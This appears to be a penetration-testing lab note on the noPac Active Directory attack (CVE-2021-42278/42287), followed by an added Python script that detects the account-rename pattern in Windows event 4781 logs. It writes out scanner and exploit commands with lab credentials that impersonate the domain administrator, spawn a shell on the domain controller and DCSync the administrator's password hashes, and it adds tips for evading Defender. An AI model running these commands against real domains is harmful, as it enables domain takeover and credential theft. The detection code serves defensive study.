
nopac

noPac attack (sAMAccountName spoofing, CVE-2021-42278 / CVE-2021-42287)

A low-privileged domain user who can create a machine account (ms-DS-MachineAccountQuota > 0) renames that account to a domain controller's name without the trailing $, requests a TGT for it, renames it back, and then asks the KDC for a service ticket via S4U2self. An unpatched DC resolves the missing name to the real DC account, so the attacker ends up with a ticket as any user they choose, including the domain administrator.

Installing the tool

  • git clone https://github.com/Ridter/noPac.git

  • Ensure the impacket tools are installed (python3 setup.py install from the impacket source tree); noPac imports impacket directly and will not run without it

Scanning for the noPac vulnerability

sudo python3 scanner.py inlanefreight.local/<user>:<pass> -dc-ip 172.16.5.5 -use-ldap

The scanner reports the domain's ms-DS-MachineAccountQuota (a regular user can only add machine accounts if it is greater than 0) and whether the DC is vulnerable. If the quota is 0, the attack still works with an existing machine account whose password you control.

Run noPac and get a shell

sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap

-shell drops into a semi-interactive smbexec.py session on the DC as the impersonated user; -use-ldap talks to the DC over LDAP instead of LDAPS. The tool also saves the obtained ticket as a .ccache file, which can be reused with other impacket tools via KRB5CCNAME.

Using noPac to DCSync the built-in administrator account

sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator

-dump performs a DCSync (secretsdump) with the impersonated ticket; -just-dc-user limits the dump to the named account, which is quieter than pulling the whole NTDS.
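The sAMAccountName swap at the heart of this attack leaves a clear trace in the DC's Security log: event 4781 ("The name of an account was changed") first shows a machine account renamed to a DC hostname without the trailing $, and then the reverse rename. The following is an added example, not code from the original page or from the noPac project: it parses constructed 4781 records in a simplified pipe-delimited form (the real fields are SubjectUserName, OldTargetUserName, NewTargetUserName, TargetDomainName) and flags both phases against an assumed DC inventory.

```python
"""Flag the noPac sAMAccountName rename pattern in Windows Security events.

Added example; not part of the page or the noPac tool. Event records and the
DC inventory below are constructed for illustration.
"""
from __future__ import annotations

from dataclasses import dataclass
from typing import Optional

# Assumed inventory of DC hostnames (without the trailing $). A defender
# would load this from LDAP or a CMDB; it is hard-coded here for the example.
DC_HOSTNAMES = {"ACADEMY-EA-DC01"}


@dataclass(frozen=True)
class Event4781:
    subject: str    # SubjectUserName: account that performed the rename
    old_name: str   # OldTargetUserName
    new_name: str   # NewTargetUserName
    domain: str     # TargetDomainName


# Constructed sample log, one event per line:
# EventID|SubjectUserName|OldTargetUserName|NewTargetUserName|TargetDomainName
SAMPLE_LOG = """\
4741|forend|-|WIN-K3M2$|INLANEFREIGHT
4781|forend|WIN-K3M2$|ACADEMY-EA-DC01|INLANEFREIGHT
4781|svc_admin|OLDPC01$|NEWPC01$|INLANEFREIGHT
4781|forend|ACADEMY-EA-DC01|WIN-K3M2$|INLANEFREIGHT
4781|helpdesk|jdoe|john.doe|INLANEFREIGHT
"""


def parse_4781(log: str) -> list[Event4781]:
    """Return only the 4781 records; other event IDs and malformed lines are skipped."""
    events: list[Event4781] = []
    for line in log.splitlines():
        fields = line.strip().split("|")
        if len(fields) != 5 or fields[0] != "4781":
            continue
        _, subject, old, new, domain = fields
        events.append(Event4781(subject, old, new, domain))
    return events


def classify(ev: Event4781, dc_hostnames: set[str]) -> Optional[str]:
    """Label a rename as the noPac 'spoof' step, the 'revert' step, or neither.

    spoof : machine account (ends with $) renamed to a DC hostname without $
    revert: that DC hostname renamed back to a machine account name
    Ordinary renames (PC$ -> PC2$, user -> user) return None.
    """
    old_is_machine = ev.old_name.endswith("$")
    new_is_machine = ev.new_name.endswith("$")
    if old_is_machine and not new_is_machine and ev.new_name.upper() in dc_hostnames:
        return "spoof"
    if not old_is_machine and new_is_machine and ev.old_name.upper() in dc_hostnames:
        return "revert"
    return None


def find_nopac_renames(log: str, dc_hostnames: set[str] = DC_HOSTNAMES) -> list[tuple[str, Event4781]]:
    """Return (phase, event) pairs for every suspicious rename in the log."""
    hits = []
    for ev in parse_4781(log):
        phase = classify(ev, dc_hostnames)
        if phase:
            hits.append((phase, ev))
    return hits


if __name__ == "__main__":
    for phase, ev in find_nopac_renames(SAMPLE_LOG):
        print(f"[{phase}] {ev.subject} renamed {ev.old_name} -> {ev.new_name} ({ev.domain})")
```

Correlating the "spoof" hit with a preceding 4741 (computer account created) by the same low-privileged subject, as in the first sample line, raises confidence further; the hostname comparison is case-insensitive because AD treats sAMAccountName that way.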

Windows Defender: If Windows Defender (or another AV/EDR) is enabled on the target, the shell session may still be established, but issuing any command will likely fail. The shell that -shell spawns is smbexec.py, and its behaviour is noisy: it first creates a service called BTOBTO, then another service called BTOBO, and every command we type is sent to the target over SMB inside a .bat file. For each command, a new batch script is created, echoed to a temp file, executed, and deleted. Defender readily catches this pattern, so on a defended host prefer the -dump path above or reuse the saved ticket with a quieter tool.
